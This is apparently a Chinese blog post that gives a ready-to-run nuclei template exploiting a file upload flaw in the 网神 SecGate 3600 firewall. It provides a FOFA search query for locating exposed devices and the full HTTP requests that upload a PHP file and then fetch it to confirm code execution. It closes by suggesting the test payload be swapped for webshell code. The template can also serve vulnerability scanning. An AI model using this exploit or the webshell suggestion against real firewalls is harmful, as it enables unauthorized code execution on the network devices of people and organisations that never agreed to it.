文章描述了网神SecGate3600防火墙上发现的一个高危文件上传漏洞,攻击者可以通过nuclei脚本利用该漏洞上传恶意文件并执行代码。攻击者展示了如何构造POST请求进行恶意文件上传和验证漏洞利用情况。
fofa语句:
title="网神SecGate 3600防火墙"
nuclei脚本:
id: wangshen-secgate-index-fileupload
info:
name: wangshen-secgate-index-fileupload
author: unknow
severity: critical
description: 网神 防火墙 index 存在文件上传漏洞。
tags: wangshen,fileupload
metadata:
fofa-query: title="网神SecGate 3600防火墙"
http:
- raw:
- |
GET / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- |
POST / HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 577
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
Cookie: __s_sessionid__={{cookie}};
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="certfile";filename="{{cookie}}.php"
Content-Type: text/plain
<?php echo(md5(233));unlink(__FILE__);?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
sec_web_auth_custom_setting_confsave
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="certfile_r"
file
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
- |
GET /attachements/{{cookie}}.php HTTP/1.1
Host:
Cookie: __s_sessionid__={{cookie}};
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
extractors:
- type: regex
name: cookie
part: header
internal: true
group: 1
regex:
- "__s_sessionid__=(.*);"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_3==200 && contains(body_3, "e165421110ba03099a1c0393373c5b43") && contains(header_3, "text/html")'
可将上传内容123456替换为shell的内容。
扫一扫
77
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
